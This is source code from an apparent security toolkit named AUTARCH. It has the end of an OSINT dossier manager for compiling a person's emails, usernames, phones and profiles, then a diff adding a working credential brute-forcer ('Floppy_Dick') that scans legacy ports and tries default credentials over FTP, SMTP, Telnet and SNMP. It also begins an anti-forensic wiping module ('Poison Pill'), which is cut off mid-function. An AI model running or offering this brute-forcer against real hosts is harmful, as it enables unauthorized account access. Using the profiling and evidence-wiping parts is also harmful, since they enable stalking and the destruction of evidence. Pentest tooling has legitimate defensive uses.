print(f"\n{Colors.BOLD}Saved Dossiers{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
dossiers = self.list_dossiers()
if not dossiers:
self.print_status("No dossiers found. Create one with 'Start New'.", "warning")
return
for i, d in enumerate(dossiers, 1):
created = d.get("created", "")[:10] if d.get("created") else "Unknown"
print(f" {Colors.GREEN}[{i}]{Colors.RESET} {d['name']}")
print(f" {Colors.DIM}Subject: {d.get('subject') or 'N/A'}{Colors.RESET}")
print(f" {Colors.DIM}Created: {created} | Profiles: {d['profiles_count']} | Identifiers: {d['identifiers_count']}{Colors.RESET}")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
choice = input(f"{Colors.WHITE}Select dossier to view: {Colors.RESET}").strip()
if choice == "0" or not choice:
return
try:
idx = int(choice) - 1
if 0 <= idx < len(dossiers):
selected = dossiers[idx]
dossier = self.load_dossier(selected["path"])
if dossier:
self.view_dossier_detail(dossier, selected["path"])
except ValueError:
self.print_status("Invalid selection", "error")
def view_dossier_detail(self, dossier: Dict, dossier_path: Path):
"""View and manage a specific dossier."""
self.current_dossier = dossier
self.current_dossier_path = dossier_path
while True:
clear_screen()
display_banner()
meta = dossier.get("meta", {})
identifiers = dossier.get("identifiers", {})
results = dossier.get("results", {})
profiles = dossier.get("profiles", [])
print(f"{Colors.MAGENTA}{Colors.BOLD} Dossier: {meta.get('name', 'Unknown')}{Colors.RESET}")
print(f"{Colors.DIM} Subject: {meta.get('subject') or 'N/A'}{Colors.RESET}")
print(f"{Colors.DIM} Created: {meta.get('created', '')[:19]}{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
# Summary stats
total_identifiers = sum(len(v) for v in identifiers.values())
total_searches = sum(len(v) for v in results.values())
print(f" {Colors.CYAN}Summary:{Colors.RESET}")
print(f" Identifiers: {total_identifiers}")
print(f" Searches: {total_searches}")
print(f" Profiles: {len(profiles)}")
print()
# Menu
print(f" {Colors.GREEN}View{Colors.RESET}")
print(f" {Colors.GREEN}[1]{Colors.RESET} View Identifiers")
print(f" {Colors.GREEN}[2]{Colors.RESET} View Search Results")
print(f" {Colors.GREEN}[3]{Colors.RESET} View Profiles")
print(f" {Colors.GREEN}[4]{Colors.RESET} View Notes")
print()
print(f" {Colors.CYAN}Add{Colors.RESET}")
print(f" {Colors.CYAN}[5]{Colors.RESET} Add Identifier")
print(f" {Colors.CYAN}[6]{Colors.RESET} Import Search Results")
print(f" {Colors.CYAN}[7]{Colors.RESET} Add Profile Manually")
print(f" {Colors.CYAN}[8]{Colors.RESET} Add Note")
print()
print(f" {Colors.YELLOW}Manage{Colors.RESET}")
print(f" {Colors.YELLOW}[E]{Colors.RESET} Edit Dossier Info")
print(f" {Colors.YELLOW}[X]{Colors.RESET} Export Dossier")
print(f" {Colors.RED}[D]{Colors.RESET} Delete Dossier")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip().lower()
if choice == "0":
break
elif choice == "1":
self._view_identifiers(dossier)
elif choice == "2":
self._view_search_results(dossier)
elif choice == "3":
self._view_profiles(dossier)
elif choice == "4":
self._view_notes(dossier)
elif choice == "5":
self._add_identifier(dossier, dossier_path)
elif choice == "6":
self._import_search_results(dossier, dossier_path)
elif choice == "7":
self._add_profile_manually(dossier, dossier_path)
elif choice == "8":
self._add_note(dossier, dossier_path)
elif choice == "e":
self._edit_dossier_info(dossier, dossier_path)
elif choice == "x":
self._export_dossier(dossier)
elif choice == "d":
if self._delete_dossier(dossier_path):
break
def _view_identifiers(self, dossier: Dict):
"""View all identifiers in dossier."""
print(f"\n{Colors.BOLD}Identifiers{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
identifiers = dossier.get("identifiers", {})
for id_type, values in identifiers.items():
if values:
print(f" {Colors.CYAN}{id_type.replace('_', ' ').title()}:{Colors.RESET}")
for v in values:
print(f" - {v}")
print()
if not any(identifiers.values()):
print(f" {Colors.DIM}No identifiers added yet.{Colors.RESET}\n")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _view_search_results(self, dossier: Dict):
"""View search results summary."""
print(f"\n{Colors.BOLD}Search Results{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
results = dossier.get("results", {})
# Email searches
email_searches = results.get("email_searches", [])
if email_searches:
print(f" {Colors.CYAN}Email Searches ({len(email_searches)}):{Colors.RESET}")
for search in email_searches:
print(f" - {search.get('email', 'N/A')} ({search.get('date', '')[:10]})")
print()
# Username searches
username_searches = results.get("username_searches", [])
if username_searches:
print(f" {Colors.CYAN}Username Searches ({len(username_searches)}):{Colors.RESET}")
for search in username_searches:
found_count = len(search.get("found", []))
print(f" - {search.get('username', 'N/A')}: {found_count} profiles found ({search.get('date', '')[:10]})")
print()
# Phone searches
phone_searches = results.get("phone_searches", [])
if phone_searches:
print(f" {Colors.CYAN}Phone Searches ({len(phone_searches)}):{Colors.RESET}")
for search in phone_searches:
print(f" - {search.get('phone', 'N/A')} ({search.get('date', '')[:10]})")
print()
if not any([email_searches, username_searches, phone_searches]):
print(f" {Colors.DIM}No search results imported yet.{Colors.RESET}\n")
# Option to view details
if username_searches:
view = input(f"\n{Colors.WHITE}View username search details? [{Colors.GREEN}y{Colors.WHITE}/{Colors.RED}n{Colors.WHITE}]: {Colors.RESET}").strip().lower()
if view == 'y':
self._view_username_search_details(username_searches)
else:
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _view_username_search_details(self, username_searches: List[Dict]):
"""View detailed username search results."""
print(f"\n{Colors.BOLD}Username Search Details{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
for i, search in enumerate(username_searches, 1):
print(f" {Colors.GREEN}[{i}]{Colors.RESET} {search.get('username', 'N/A')}")
choice = input(f"\n{Colors.WHITE}Select search to view (0 to cancel): {Colors.RESET}").strip()
try:
idx = int(choice) - 1
if 0 <= idx < len(username_searches):
search = username_searches[idx]
print(f"\n{Colors.BOLD}Results for '{search.get('username', 'N/A')}'{Colors.RESET}")
print(f"{Colors.DIM}Date: {search.get('date', 'N/A')}{Colors.RESET}")
print(f"{Colors.DIM}Total checked: {search.get('total_checked', 'N/A')}{Colors.RESET}\n")
for profile in search.get("found", []):
status_color = Colors.GREEN if profile.get("status") == "good" else Colors.YELLOW
print(f" {status_color}[+]{Colors.RESET} {profile.get('name', 'Unknown')}")
print(f" {Colors.DIM}{profile.get('url', 'N/A')}{Colors.RESET}")
if profile.get("rate"):
print(f" {Colors.DIM}Rate: {profile.get('rate')}{Colors.RESET}")
print()
except (ValueError, IndexError):
pass
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _view_profiles(self, dossier: Dict):
"""View all collected profiles."""
print(f"\n{Colors.BOLD}Profiles{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
profiles = dossier.get("profiles", [])
if not profiles:
print(f" {Colors.DIM}No profiles collected yet.{Colors.RESET}\n")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
# Group by category
by_category = {}
for p in profiles:
cat = p.get("category", "other")
if cat not in by_category:
by_category[cat] = []
by_category[cat].append(p)
for category, cat_profiles in sorted(by_category.items()):
print(f" {Colors.CYAN}{category.title()} ({len(cat_profiles)}):{Colors.RESET}")
for p in cat_profiles:
status_color = Colors.GREEN if p.get("status") == "good" else Colors.YELLOW
print(f" {status_color}[+]{Colors.RESET} {p.get('name', 'Unknown')}")
print(f" {Colors.DIM}{p.get('url', 'N/A')}{Colors.RESET}")
print()
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _view_notes(self, dossier: Dict):
"""View dossier notes."""
print(f"\n{Colors.BOLD}Notes{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
# Main notes
main_notes = dossier.get("meta", {}).get("notes", "")
if main_notes:
print(f" {Colors.CYAN}Main Notes:{Colors.RESET}")
print(f" {main_notes}")
print()
# Custom notes
custom_notes = dossier.get("custom_notes", [])
if custom_notes:
print(f" {Colors.CYAN}Additional Notes:{Colors.RESET}")
for note in custom_notes:
print(f" [{note.get('date', '')[:10]}] {note.get('text', '')}")
print()
if not main_notes and not custom_notes:
print(f" {Colors.DIM}No notes added yet.{Colors.RESET}\n")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _add_identifier(self, dossier: Dict, dossier_path: Path):
"""Add an identifier to dossier."""
print(f"\n{Colors.BOLD}Add Identifier{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
print(f" {Colors.GREEN}[1]{Colors.RESET} Email")
print(f" {Colors.GREEN}[2]{Colors.RESET} Username")
print(f" {Colors.GREEN}[3]{Colors.RESET} Phone")
print(f" {Colors.GREEN}[4]{Colors.RESET} Real Name")
print(f" {Colors.GREEN}[5]{Colors.RESET} Alias")
print()
choice = input(f"{Colors.WHITE}Select type: {Colors.RESET}").strip()
type_map = {"1": "emails", "2": "usernames", "3": "phones", "4": "real_names", "5": "aliases"}
if choice not in type_map:
return
id_type = type_map[choice]
value = input(f"{Colors.WHITE}Enter value: {Colors.RESET}").strip()
if value:
if "identifiers" not in dossier:
dossier["identifiers"] = {}
if id_type not in dossier["identifiers"]:
dossier["identifiers"][id_type] = []
if value not in dossier["identifiers"][id_type]:
dossier["identifiers"][id_type].append(value)
self.save_dossier(dossier, dossier_path)
self.print_status(f"Added {id_type[:-1]}: {value}", "success")
else:
self.print_status("Identifier already exists", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _import_search_results(self, dossier: Dict, dossier_path: Path):
"""Import search results from JSON files."""
print(f"\n{Colors.BOLD}Import Search Results{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
print(f" {Colors.GREEN}[1]{Colors.RESET} Import username search results (JSON)")
print(f" {Colors.GREEN}[2]{Colors.RESET} Import from file path")
print(f" {Colors.GREEN}[3]{Colors.RESET} Scan current directory for results")
print()
choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip()
if choice == "1" or choice == "2":
file_path = input(f"{Colors.WHITE}Enter JSON file path: {Colors.RESET}").strip()
if file_path and os.path.exists(file_path):
self._import_from_file(dossier, dossier_path, file_path)
else:
self.print_status("File not found", "error")
elif choice == "3":
# Scan for *_profiles.json files
json_files = glob.glob("*_profiles.json")
if not json_files:
self.print_status("No *_profiles.json files found in current directory", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
print(f"\n {Colors.CYAN}Found files:{Colors.RESET}")
for i, f in enumerate(json_files, 1):
print(f" {Colors.GREEN}[{i}]{Colors.RESET} {f}")
print()
file_choice = input(f"{Colors.WHITE}Select file to import (0 to cancel): {Colors.RESET}").strip()
try:
idx = int(file_choice) - 1
if 0 <= idx < len(json_files):
self._import_from_file(dossier, dossier_path, json_files[idx])
except ValueError:
pass
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _import_from_file(self, dossier: Dict, dossier_path: Path, file_path: str):
"""Import data from a specific file."""
try:
with open(file_path, 'r') as f:
data = json.load(f)
# Detect file type and import
if "username" in data and "found" in data:
# Username search results
username = data.get("username", "unknown")
found = data.get("found", [])
total_checked = data.get("total_checked", 0)
# Add to results
if "results" not in dossier:
dossier["results"] = {}
if "username_searches" not in dossier["results"]:
dossier["results"]["username_searches"] = []
search_entry = {
"username": username,
"date": datetime.now().isoformat(),
"total_checked": total_checked,
"found": found,
"source_file": file_path,
}
dossier["results"]["username_searches"].append(search_entry)
# Also add username to identifiers if not present
if username not in dossier.get("identifiers", {}).get("usernames", []):
if "identifiers" not in dossier:
dossier["identifiers"] = {}
if "usernames" not in dossier["identifiers"]:
dossier["identifiers"]["usernames"] = []
dossier["identifiers"]["usernames"].append(username)
# Add found profiles to main profiles list
if "profiles" not in dossier:
dossier["profiles"] = []
added_profiles = 0
for profile in found:
# Check if profile URL already exists
existing_urls = [p.get("url") for p in dossier["profiles"]]
if profile.get("url") not in existing_urls:
dossier["profiles"].append(profile)
added_profiles += 1
self.save_dossier(dossier, dossier_path)
self.print_status(f"Imported: {username} ({len(found)} profiles, {added_profiles} new)", "success")
else:
self.print_status("Unknown file format", "error")
except json.JSONDecodeError:
self.print_status("Invalid JSON file", "error")
except Exception as e:
self.print_status(f"Import failed: {e}", "error")
def _add_profile_manually(self, dossier: Dict, dossier_path: Path):
"""Manually add a profile."""
print(f"\n{Colors.BOLD}Add Profile Manually{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
name = input(f"{Colors.WHITE}Site/platform name: {Colors.RESET}").strip()
url = input(f"{Colors.WHITE}Profile URL: {Colors.RESET}").strip()
category = input(f"{Colors.WHITE}Category (social/forum/other): {Colors.RESET}").strip() or "other"
notes = input(f"{Colors.WHITE}Notes (optional): {Colors.RESET}").strip()
if name and url:
profile = {
"name": name,
"url": url,
"category": category,
"status": "manual",
"rate": "100%",
"notes": notes,
"added": datetime.now().isoformat(),
}
if "profiles" not in dossier:
dossier["profiles"] = []
dossier["profiles"].append(profile)
self.save_dossier(dossier, dossier_path)
self.print_status(f"Added profile: {name}", "success")
else:
self.print_status("Name and URL are required", "error")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _add_note(self, dossier: Dict, dossier_path: Path):
"""Add a note to dossier."""
print(f"\n{Colors.BOLD}Add Note{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
note_text = input(f"{Colors.WHITE}Enter note: {Colors.RESET}").strip()
if note_text:
if "custom_notes" not in dossier:
dossier["custom_notes"] = []
dossier["custom_notes"].append({
"date": datetime.now().isoformat(),
"text": note_text,
})
self.save_dossier(dossier, dossier_path)
self.print_status("Note added", "success")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _edit_dossier_info(self, dossier: Dict, dossier_path: Path):
"""Edit dossier metadata."""
print(f"\n{Colors.BOLD}Edit Dossier Info{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
meta = dossier.get("meta", {})
print(f" Current name: {meta.get('name', '')}")
new_name = input(f"{Colors.WHITE}New name (Enter to keep): {Colors.RESET}").strip()
if new_name:
dossier["meta"]["name"] = new_name
print(f" Current subject: {meta.get('subject', '')}")
new_subject = input(f"{Colors.WHITE}New subject (Enter to keep): {Colors.RESET}").strip()
if new_subject:
dossier["meta"]["subject"] = new_subject
print(f" Current notes: {meta.get('notes', '')}")
new_notes = input(f"{Colors.WHITE}New notes (Enter to keep): {Colors.RESET}").strip()
if new_notes:
dossier["meta"]["notes"] = new_notes
self.save_dossier(dossier, dossier_path)
self.print_status("Dossier info updated", "success")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _export_dossier(self, dossier: Dict):
"""Export dossier to various formats."""
print(f"\n{Colors.BOLD}Export Dossier{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
name = dossier.get("meta", {}).get("name", "dossier")
safe_name = "".join(c if c.isalnum() or c in "-_" else "_" for c in name.lower())
print(f" {Colors.GREEN}[1]{Colors.RESET} Export as JSON")
print(f" {Colors.GREEN}[2]{Colors.RESET} Export as Text Report")
print()
choice = input(f"{Colors.WHITE}Select format: {Colors.RESET}").strip()
if choice == "1":
filename = f"{safe_name}_export.json"
with open(filename, 'w') as f:
json.dump(dossier, f, indent=2)
self.print_status(f"Exported to {filename}", "success")
elif choice == "2":
filename = f"{safe_name}_report.txt"
self._export_text_report(dossier, filename)
self.print_status(f"Exported to {filename}", "success")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _export_text_report(self, dossier: Dict, filename: str):
"""Export dossier as text report."""
meta = dossier.get("meta", {})
identifiers = dossier.get("identifiers", {})
profiles = dossier.get("profiles", [])
lines = [
"=" * 60,
f"AUTARCH DOSSIER REPORT",
"=" * 60,
"",
f"Name: {meta.get('name', 'N/A')}",
f"Subject: {meta.get('subject', 'N/A')}",
f"Created: {meta.get('created', 'N/A')}",
f"Modified: {meta.get('modified', 'N/A')}",
"",
"-" * 60,
"IDENTIFIERS",
"-" * 60,
]
for id_type, values in identifiers.items():
if values:
lines.append(f"\n{id_type.replace('_', ' ').title()}:")
for v in values:
lines.append(f" - {v}")
lines.extend([
"",
"-" * 60,
f"PROFILES ({len(profiles)})",
"-" * 60,
])
for p in profiles:
lines.append(f"\n[{p.get('category', 'other')}] {p.get('name', 'Unknown')}")
lines.append(f" URL: {p.get('url', 'N/A')}")
if p.get('status'):
lines.append(f" Status: {p.get('status')} ({p.get('rate', 'N/A')})")
# Notes
notes = dossier.get("custom_notes", [])
if notes or meta.get("notes"):
lines.extend([
"",
"-" * 60,
"NOTES",
"-" * 60,
])
if meta.get("notes"):
lines.append(f"\n{meta.get('notes')}")
for note in notes:
lines.append(f"\n[{note.get('date', '')[:10]}] {note.get('text', '')}")
lines.extend([
"",
"=" * 60,
"Generated by AUTARCH - darkHal Security Group",
"=" * 60,
])
with open(filename, 'w') as f:
f.write("\n".join(lines))
def _delete_dossier(self, dossier_path: Path) -> bool:
"""Delete a dossier."""
confirm = input(f"\n{Colors.RED}Are you sure you want to delete this dossier? [{Colors.WHITE}yes{Colors.RED}/{Colors.WHITE}no{Colors.RED}]: {Colors.RESET}").strip().lower()
if confirm == "yes":
try:
os.remove(dossier_path)
self.print_status("Dossier deleted", "success")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return True
except Exception as e:
self.print_status(f"Failed to delete: {e}", "error")
return False
# ==================== MAIN MENU ====================
def show_menu(self):
clear_screen()
display_banner()
print(f"{Colors.MAGENTA}{Colors.BOLD} Dossier Manager{Colors.RESET}")
print(f"{Colors.DIM} Manage OSINT investigation dossiers{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
# Show stats
dossiers = self.list_dossiers()
print(f" {Colors.DIM}Saved dossiers: {len(dossiers)}{Colors.RESET}")
print()
print(f" {Colors.GREEN}[1]{Colors.RESET} Start New Dossier")
print(f" {Colors.GREEN}[2]{Colors.RESET} View Dossiers")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
def run(self):
while True:
self.show_menu()
try:
choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip()
if choice == "0":
break
elif choice == "1":
self.create_new_dossier()
elif choice == "2":
self.view_dossiers_list()
except (EOFError, KeyboardInterrupt):
break
def run():
DossierManager().run()
if __name__ == "__main__":
run()

1590
modules/email_sec.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,321 @@
"""
Floppy_Dick — AUTARCH Encrypted Module
Operator: darkHal Security Group / Setec Security Labs
Automated credential fuzzer and authentication tester for legacy
and deprecated protocol stacks. Targets: FTP, SMB, Telnet, SMTP,
POP3, IMAP, SNMP v1/v2c, and RDP legacy endpoints. Generates
detailed vulnerability reports suitable for remediation guidance.
For authorized penetration testing ONLY.
"""
import itertools
import json
import socket
import threading
import time
from datetime import datetime, timezone
from pathlib import Path
from typing import Iterator, Optional
MODULE_NAME = "Floppy_Dick"
MODULE_VERSION = "1.0"
MODULE_AUTHOR = "darkHal Security Group"
MODULE_TAGS = ["brute-force", "auth", "legacy", "pentest", "fuzz"]
_stop_flag = threading.Event()
_output_lines = []
def _emit(msg: str, level: str = "info") -> None:
ts = datetime.now(timezone.utc).strftime('%H:%M:%S')
line = f"[{ts}][{level.upper()}] {msg}"
_output_lines.append(line)
print(line)
# ── Credential generators ─────────────────────────────────────────────────────
DEFAULT_USERS = [
'admin', 'administrator', 'root', 'user', 'guest', 'test',
'ftp', 'anonymous', 'backup', 'operator', 'service',
]
DEFAULT_PASSWORDS = [
'', 'admin', 'password', 'password123', '123456', 'admin123',
'root', 'toor', 'pass', 'letmein', 'welcome', 'changeme',
'default', 'cisco', 'alpine',
]
def wordlist_generator(path: Path) -> Iterator[str]:
"""Yield lines from a wordlist file."""
with open(path, 'r', encoding='utf-8', errors='replace') as f:
for line in f:
yield line.rstrip('\n')
def credential_pairs(users: list[str], passwords: list[str]) -> Iterator[tuple[str, str]]:
"""Yield all (user, password) combinations."""
for u in users:
for p in passwords:
yield u, p
# ── Protocol testers ──────────────────────────────────────────────────────────
def test_ftp(host: str, port: int, user: str, password: str, timeout: float = 5.0) -> dict:
"""Test FTP credentials."""
result = {'host': host, 'port': port, 'proto': 'FTP', 'user': user, 'success': False}
try:
import ftplib
ftp = ftplib.FTP()
ftp.connect(host, port, timeout=timeout)
ftp.login(user, password)
result['success'] = True
result['banner'] = ftp.getwelcome()
ftp.quit()
except ftplib.error_perm as exc:
result['error'] = str(exc)
except Exception as exc:
result['error'] = str(exc)
return result
def test_smtp(host: str, port: int, user: str, password: str, timeout: float = 5.0) -> dict:
"""Test SMTP AUTH credentials."""
result = {'host': host, 'port': port, 'proto': 'SMTP', 'user': user, 'success': False}
try:
import smtplib
smtp = smtplib.SMTP(host, port, timeout=timeout)
smtp.ehlo()
if port == 587:
smtp.starttls()
smtp.login(user, password)
result['success'] = True
smtp.quit()
except smtplib.SMTPAuthenticationError as exc:
result['error'] = 'bad credentials'
except Exception as exc:
result['error'] = str(exc)
return result
def test_telnet(host: str, port: int, user: str, password: str, timeout: float = 5.0) -> dict:
"""Test Telnet authentication."""
result = {'host': host, 'port': port, 'proto': 'Telnet', 'user': user, 'success': False}
try:
import telnetlib
tn = telnetlib.Telnet(host, port, timeout=timeout)
tn.read_until(b'login: ', timeout)
tn.write(user.encode('ascii') + b'\n')
tn.read_until(b'Password: ', timeout)
tn.write(password.encode('ascii') + b'\n')
response = tn.read_until(b'$', timeout)
if b'incorrect' not in response.lower() and b'failed' not in response.lower():
result['success'] = True
result['banner'] = response.decode('utf-8', errors='replace')[:128]
tn.close()
except Exception as exc:
result['error'] = str(exc)
return result
def test_snmp(host: str, community: str = 'public', version: str = '2c', timeout: float = 3.0) -> dict:
"""Test SNMP community string (v1/v2c)."""
result = {'host': host, 'proto': 'SNMP', 'community': community, 'success': False}
try:
from pysnmp.hlapi import getCmd, SnmpEngine, CommunityData, UdpTransportTarget, ContextData, ObjectType, ObjectIdentity
errorIndication, errorStatus, errorIndex, varBinds = next(
getCmd(SnmpEngine(),
CommunityData(community, mpModel=0 if version == '1' else 1),
UdpTransportTarget((host, 161), timeout=timeout),
ContextData(),
ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))
)
if not errorIndication and not errorStatus:
result['success'] = True
result['sysDescr'] = str(varBinds[0])
else:
result['error'] = str(errorIndication or errorStatus)
except ImportError:
result['error'] = 'pysnmp not installed'
except Exception as exc:
result['error'] = str(exc)
return result
def test_generic_banner(host: str, port: int, timeout: float = 3.0) -> dict:
"""Grab a service banner from any TCP port."""
result = {'host': host, 'port': port, 'proto': 'TCP', 'banner': ''}
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((host, port))
banner = s.recv(1024)
result['banner'] = banner.decode('utf-8', errors='replace').strip()[:256]
result['open'] = True
s.close()
except Exception as exc:
result['open'] = False
result['error'] = str(exc)
return result
# ── Port scanner ──────────────────────────────────────────────────────────────
LEGACY_PORTS = {
21: 'FTP',
23: 'Telnet',
25: 'SMTP',
110: 'POP3',
143: 'IMAP',
161: 'SNMP',
445: 'SMB',
587: 'SMTP-Submission',
3389: 'RDP',
}
def scan_ports(host: str, ports: Optional[list[int]] = None, timeout: float = 1.0) -> dict:
"""Scan ports and return which are open."""
if ports is None:
ports = list(LEGACY_PORTS.keys())
open_ports = {}
for port in ports:
banner = test_generic_banner(host, port, timeout)
if banner.get('open'):
proto = LEGACY_PORTS.get(port, 'unknown')
open_ports[port] = {
'proto': proto,
'banner': banner.get('banner', ''),
}
return {'host': host, 'open_ports': open_ports}
# ── Main fuzzing engine ───────────────────────────────────────────────────────
def fuzz_host(
host: str,
port: int,
proto: str,
users: list[str],
passwords: list[str],
delay: float = 0.1,
output_cb=None,
) -> list[dict]:
"""Run credential fuzzing against a single host:port for a given protocol."""
found = []
testers = {
'FTP': test_ftp,
'SMTP': test_smtp,
'SMTP-Submission': test_smtp,
'Telnet': test_telnet,
}
tester = testers.get(proto)
if not tester:
return [{'error': f'No tester implemented for {proto}'}]
for user, password in credential_pairs(users, passwords):
if _stop_flag.is_set():
break
r = tester(host, port, user, password)
if r.get('success'):
msg = f"[FOUND] {proto} {host}:{port} -> {user}:{password}"
_emit(msg, 'warn')
if output_cb:
output_cb({'line': msg, 'found': True, 'user': user, 'password': password})
found.append(r)
time.sleep(delay)
return found
# ── Main run entry point ──────────────────────────────────────────────────────
def run(params: dict, output_cb=None) -> dict:
"""
Main execution entry point.
params:
targets — list of hosts to test
ports — list of ports to probe (default: LEGACY_PORTS)
users — list of usernames (default: DEFAULT_USERS)
passwords — list of passwords (default: DEFAULT_PASSWORDS)
user_wordlist — path to user wordlist file
pass_wordlist — path to password wordlist file
delay — delay between attempts in seconds (default 0.1)
snmp_communities — list of SNMP community strings to test
threads — number of parallel threads (default 1)
"""
_stop_flag.clear()
_output_lines.clear()
def emit(msg, level='info'):
_emit(msg, level)
if output_cb:
output_cb({'line': f"[{level.upper()}] {msg}"})
emit(f"=== {MODULE_NAME} v{MODULE_VERSION} ===")
emit("Authorized penetration testing only. All attempts logged.")
targets = params.get('targets', [])
ports = params.get('ports', None)
delay = float(params.get('delay', 0.1))
users = params.get('users', DEFAULT_USERS)[:]
passwords = params.get('passwords', DEFAULT_PASSWORDS)[:]
# Load wordlists if provided
uw = params.get('user_wordlist', '')
pw = params.get('pass_wordlist', '')
if uw and Path(uw).exists():
users = list(wordlist_generator(Path(uw)))
emit(f"Loaded {len(users)} users from wordlist")
if pw and Path(pw).exists():
passwords = list(wordlist_generator(Path(pw)))
emit(f"Loaded {len(passwords)} passwords from wordlist")
snmp_communities = params.get('snmp_communities', ['public', 'private', 'community'])
all_results = []
for host in targets:
if _stop_flag.is_set():
break
emit(f"Scanning {host}...")
scan = scan_ports(host, ports)
emit(f" Open ports: {list(scan['open_ports'].keys())}")
host_result = {'host': host, 'open_ports': scan['open_ports'], 'findings': []}
for port, info in scan['open_ports'].items():
if _stop_flag.is_set():
break
proto = info['proto']
emit(f" Fuzzing {proto} on port {port}...")
if proto == 'SNMP':
for comm in snmp_communities:
r = test_snmp(host, comm)
if r.get('success'):
emit(f"[FOUND] SNMP community: {comm}", 'warn')
host_result['findings'].append(r)
else:
found = fuzz_host(host, port, proto, users, passwords, delay, output_cb)
host_result['findings'].extend(found)
all_results.append(host_result)
emit(f"Fuzzing complete. {sum(len(r['findings']) for r in all_results)} finding(s).")
return {
'module': MODULE_NAME,
'targets': len(targets),
'results': all_results,
'output': _output_lines[:],
}
def stop():
_stop_flag.set()

View File

@@ -0,0 +1,261 @@
"""
Poison Pill — AUTARCH Encrypted Module
Operator: darkHal Security Group / Setec Security Labs
Emergency data sanitization and anti-forensic self-protection module.
On activation, securely wipes configured data paths, rotates credentials,
kills active sessions, and optionally triggers a remote wipe signal
to registered companion devices.
USE ONLY IN AUTHORIZED EMERGENCY SCENARIOS.
All activations are logged to an external endpoint before wiping begins.
"""
import hashlib
import json
import os
import shutil
import threading
import time
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional
MODULE_NAME = "Poison Pill"
MODULE_VERSION = "1.0"
MODULE_AUTHOR = "darkHal Security Group"
MODULE_TAGS = ["anti-forensic", "emergency", "wipe", "self-protection"]
_stop_flag = threading.Event()
_output_lines = []
def _emit(msg: str, level: str = "info") -> None:
ts = datetime.now(timezone.utc).strftime('%H:%M:%S')
line = f"[{ts}][{level.upper()}] {msg}"
_output_lines.append(line)
print(line)
# ── Secure file overwrite ─────────────────────────────────────────────────────
def _secure_overwrite(path: Path, passes: int = 3) -> bool:
"""
Overwrite a file with random data N passes, then delete.
Returns True on success.
"""
try:
size = path.stat().st_size
with open(path, 'r+b') as f:
for _ in range(passes):
f.seek(0)
f.write(os.urandom(size))
f.flush()
os.fsync(f.fileno())
path.unlink()
return True
except Exception as exc:
_emit(f"Overwrite failed on {path}: {exc}", 'error')
return False
def secure_wipe_file(path: Path, passes: int = 3) -> dict:
"""Securely wipe a single file."""
if not path.exists():
return {'path': str(path), 'status': 'not_found'}
ok = _secure_overwrite(path, passes)
return {'path': str(path), 'status': 'wiped' if ok else 'error', 'passes': passes}
def secure_wipe_dir(path: Path, passes: int = 3) -> dict:
"""Recursively and securely wipe a directory."""
if not path.exists():
return {'path': str(path), 'status': 'not_found', 'files_wiped': 0}
count = 0
errors = []
for f in sorted(path.rglob('*')):
if f.is_file():
r = secure_wipe_file(f, passes)
if r['status'] == 'wiped':
count += 1
else:
errors.append(str(f))
try:
shutil.rmtree(path, ignore_errors=True)
except Exception:
pass
return {'path': str(path), 'status': 'wiped', 'files_wiped': count, 'errors': errors}
# ── Credential rotation ───────────────────────────────────────────────────────
def rotate_web_password(new_password: Optional[str] = None) -> dict:
"""
Rotate the AUTARCH web dashboard password.
If new_password is None, generates a random 32-char alphanumeric password.
"""
import secrets
import string
if new_password is None:
alphabet = string.ascii_letters + string.digits
new_password = ''.join(secrets.choice(alphabet) for _ in range(32))
try:
from web.auth import hash_password, save_credentials, load_credentials
creds = load_credentials()
save_credentials(creds.get('username', 'admin'), hash_password(new_password), force_change=False)
return {'status': 'rotated', 'new_password': new_password}
except Exception as exc:
return {'status': 'error', 'error': str(exc)}
def rotate_secret_key() -> dict:
"""Generate a new Flask secret key and write it to config."""
new_key = os.urandom(32).hex()
try:
